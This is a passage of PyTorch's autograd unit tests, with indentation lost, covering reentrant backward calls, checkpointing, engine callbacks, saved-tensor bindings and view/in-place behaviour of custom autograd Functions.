class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
"""
s = TestCase.runWithPytorchAPIUsageStderr(code)
self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
@unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
def test_deep_reentrant(self):
class DeepReentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
if ctx.x < 0:
return x
with torch.enable_grad():
DeepReentrant.apply(ctx.x).sum().backward()
return x
# Test stack overflow escape mechanism
v = torch.tensor(2000.0, requires_grad=True)
# This will cause stack overflow if reentrant calls are handled
# in the same thread recursively
DeepReentrant.apply(v).sum().backward()
# Test stack overflow escape mechanism multiple times
# to ensure reusing workers in the pool works fine
v2 = torch.tensor(200.0, requires_grad=True)
DeepReentrant.apply(v2).sum().backward()
def test_reentrant_priority(self):
order = []
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
order.append("MyFunction")
return x
class Reentrant(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x.detach(), requires_grad=True)
ctx.x = ctx.x - 1
return ctx.x.detach()
@staticmethod
def backward(ctx, x):
order.append("Reentrant")
if ctx.x < 0:
return x
with torch.enable_grad():
Reentrant.apply(ctx.x).backward()
return x
a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
v = a * b
v.backward()
# The tasks for the Reentrant and MyFunction backward() will be added
# to the queue in the autograd engine at the same time. The backward
# for Reentrant will be executed first, which will then add other
# backward tasks to the queue. We want to ensure all the reentrant tasks
# are prioritized over the MyFunction backward task regardless of their
# sequence numbers
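# Worked count for the assertions below: Reentrant starts from 9.0, forward stores
# ctx.x = x - 1, and each backward appends "Reentrant" and then recurses on ctx.x until
# it goes negative; the successive ctx.x values 8, 7, ..., 0, -1 give 10 "Reentrant"
# entries, and the single "MyFunction" backward runs only after all of them, so 11 total.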
self.assertEqual(len(order), 11)
self.assertEqual(order.count("Reentrant"), 10)
self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
mean_combined.backward()
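# Note on what this exercises (roughly): checkpoint does not keep the module's
# intermediate activations alive after the forward; it re-runs the module under grad
# during backward, trading extra compute for memory. That is what lets 2000 inputs go
# through a 1000-wide bottleneck without storing every intermediate until backward.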
def test_checkpoint_valid_reset_on_error(self):
a = torch.randn(2, 2, requires_grad=True)
with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"):
b = checkpoint(torch.exp, a).sum()
torch.autograd.grad(b, (a,))
c = checkpoint(torch.exp, a).sum()
c.backward()
def test_callback_adds_callback(self):
called = [0]
def callback_final():
called[0] += 1
def callback_adds_callback():
called[0] += 1
Variable._execution_engine.queue_callback(callback_final)
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, grad):
Variable._execution_engine.queue_callback(callback_adds_callback)
return grad
a = torch.rand((3, 3), requires_grad=True)
b = MyFunc.apply(a)
b.sum().backward()
self.assertEqual(called[0], 2)
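# Why called[0] == 2: callbacks queued via Variable._execution_engine.queue_callback run
# once the backward pass has finished its graph tasks, and a callback queued from inside
# another callback (as callback_adds_callback does for callback_final) still runs in the
# same pass, so both callbacks fire exactly once.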
def _test_reentrant_with_callbacks(self, install_callbacks_in_depths):
counter = {}
counter["inner"] = 0
counter["outer"] = 0
def inc_inner_counter():
counter["inner"] += 1
def inc_outer_counter():
counter["outer"] += 1
class MyFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 1 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_inner_counter)
return input
class MyReentrantFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if 0 in install_callbacks_in_depths:
# Add a callback to execute.
Variable._execution_engine.queue_callback(inc_outer_counter)
# Reentrant backward call.
tmp_inp = input.detach().requires_grad_()
with torch.enable_grad():
tmp_out = (MyFunc.apply(tmp_inp)).sum()
tmp_out.backward()
return input
t1 = torch.rand((3, 3), requires_grad=True)
t2 = MyReentrantFunc.apply(t1)
t3 = t2.sum()
torch.autograd.backward([t3])
return counter
def test_reentrant_with_callbacks_depth_0(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([0])
self.assertEqual(1, ret["outer"])
self.assertEqual(0, ret["inner"])
def test_reentrant_with_callbacks_depth_1(self):
# Verify callback is called only once.
ret = self._test_reentrant_with_callbacks([1])
self.assertEqual(0, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_callbacks_both_depths(self):
# Verify callback is called twice.
ret = self._test_reentrant_with_callbacks([0, 1])
self.assertEqual(1, ret["outer"])
self.assertEqual(1, ret["inner"])
def test_reentrant_with_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def add_gradient_penalty_to_grad(grad):
handle.remove()
old_param_grad = grad
param.grad = None
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
new_param = param.detach().requires_grad_()
out = ((g * 2) + new_param).sum()
out.backward()
res = g.grad + grad
param.grad = old_param_grad
return res
handle = param.register_hook(add_gradient_penalty_to_grad)
# Forward pass
tmp = (param * param)
loss = tmp.sum()
# Compute the gradients
loss.backward()
def test_reentrant_with_non_leaf_variable_hook(self):
handle = None
param = torch.rand(10, requires_grad=True)
def manual_increase_gradient(grad):
handle.remove()
# Add some sort of gradient penalty by directly updating the gradients
with torch.enable_grad():
g = grad.detach().requires_grad_()
out = ((g * 2) + 5).sum()
out.backward()
res = g.grad + grad
return res
# Forward pass
tmp = (param * param)
handle = tmp.register_hook(manual_increase_gradient)
loss = tmp.sum()
# Compute the gradients
loss.backward()
self.assertEqual(param.grad, 6 * param)
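# Worked out: loss = tmp.sum() sends grad = ones into the hook on tmp; inside the hook,
# out = (2 * g + 5).sum() gives g.grad = 2, so the hook returns 2 + 1 = 3 elementwise;
# that modified grad then flows through tmp = param * param, so param.grad = 3 * 2 * param.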
def test_grad_fn_attr_bindings(self):
# Check that the getter of each type returns what we want
# See `gen_autograd_functions.py` for how the getters are generated
#
# This test is only meant to check if the codegen'd bindings work
# Please help update this test if you update the names of any of the fields we check!
#
a = torch.ones(1, requires_grad=True)
b = torch.ones(1, requires_grad=True)
out = torch.stack([a, b], dim=0)
self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor]
self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_tensors[0], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int
self.assertIsInstance(out.grad_fn._saved_dim, int)
out.grad_fn._raw_saved_tensors[0].register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._raw_saved_tensors
self.assertEqual(out.grad_fn._saved_dim, 0)
a = torch.ones(2, 2, requires_grad=True)
indices = torch.tensor([0, 1])
out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell whether the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolutely correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are in-place operations allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are in-place operations allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward0 is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolutely correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b in place for gradcheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly?
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertEqual(non_inplace_grad, inplace_grad)
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolutely correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This checks that multiple views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolutely correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these tests will be BC-breaking and should be done carefully.
# This test checks custom autograd.Functions that perform in-place operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
